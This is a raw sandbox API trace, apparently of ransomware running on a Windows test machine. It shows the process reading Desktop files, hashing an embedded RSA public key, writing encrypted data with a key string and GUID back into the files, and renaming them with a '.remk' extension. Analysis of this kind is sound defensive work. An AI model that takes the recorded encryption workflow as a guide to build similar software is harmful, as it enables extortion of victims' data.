HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0233.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.135] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x8e88, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x8e88, lpOverlapped=0x0) returned 1 [0233.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0233.135] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8e8d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.135] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0233.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.136] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0233.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.136] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.136] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.136] CloseHandle (hObject=0x640) returned 1 [0233.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e730 [0233.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b8 [0233.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e730 | out: hHeap=0x630000) returned 1 [0233.139] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\0FzPFdGAHuuuKllKc sv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\74 zpvmu\\0fzpfdgahuuukllkc sv.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\0FzPFdGAHuuuKllKc sv.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\74 zpvmu\\0fzpfdgahuuukllkc sv.flv.remk")) returned 1 [0233.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b8 | out: hHeap=0x630000) returned 1 [0233.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.140] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0233.141] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19dc1d20, ftCreationTime.dwHighDateTime=0x1d5e6e6, ftLastAccessTime.dwLowDateTime=0x8da836a0, ftLastAccessTime.dwHighDateTime=0x1d5e220, ftLastWriteTime.dwLowDateTime=0x8da836a0, ftLastWriteTime.dwHighDateTime=0x1d5e220, nFileSizeHigh=0x0, nFileSizeLow=0xa2db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HfHAO43nG1N.ppt", cAlternateFileName="HFHAO4~1.PPT")) returned 1 [0233.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e568 [0233.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.141] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\HfHAO43nG1N.ppt") returned=".ppt" [0233.141] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\HfHAO43nG1N.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\74 zpvmu\\hfhao43ng1n.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.142] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=41691) returned 1 [0233.142] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.145] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa2b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.145] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.148] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.148] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0233.148] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xa2db, lpOverlapped=0x0) returned 1 [0233.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.149] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.149] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0233.150] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.150] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.150] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.150] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.150] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.150] GetLastError () returned 0x0 [0233.151] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.151] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0233.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.151] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.151] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.151] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa2e0) returned 0x37c2278 [0233.151] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0233.151] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0233.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.151] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb618 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee328 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb660 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee340 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee370 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee388 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0233.152] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee388 | out: hHeap=0x630000) returned 1 [0233.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.152] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee388 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0233.152] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee370 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee388 | out: hHeap=0x630000) returned 1 [0233.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0233.153] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.153] GetCurrentThreadId () returned 0x314 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9a10 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.153] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.154] GetCurrentThreadId () returned 0x314 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3d0 [0233.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee370 [0233.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee388 [0233.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee358 [0233.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3e8 [0233.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0233.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3b8 [0233.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee3a0 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee400 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3a0 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee3a0 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3b8 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee370 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37b5b70 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3d0 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee400 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5d80 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5f98 [0233.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0233.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d80 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5f98 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3a0 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee3e8 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee388 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee358 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: 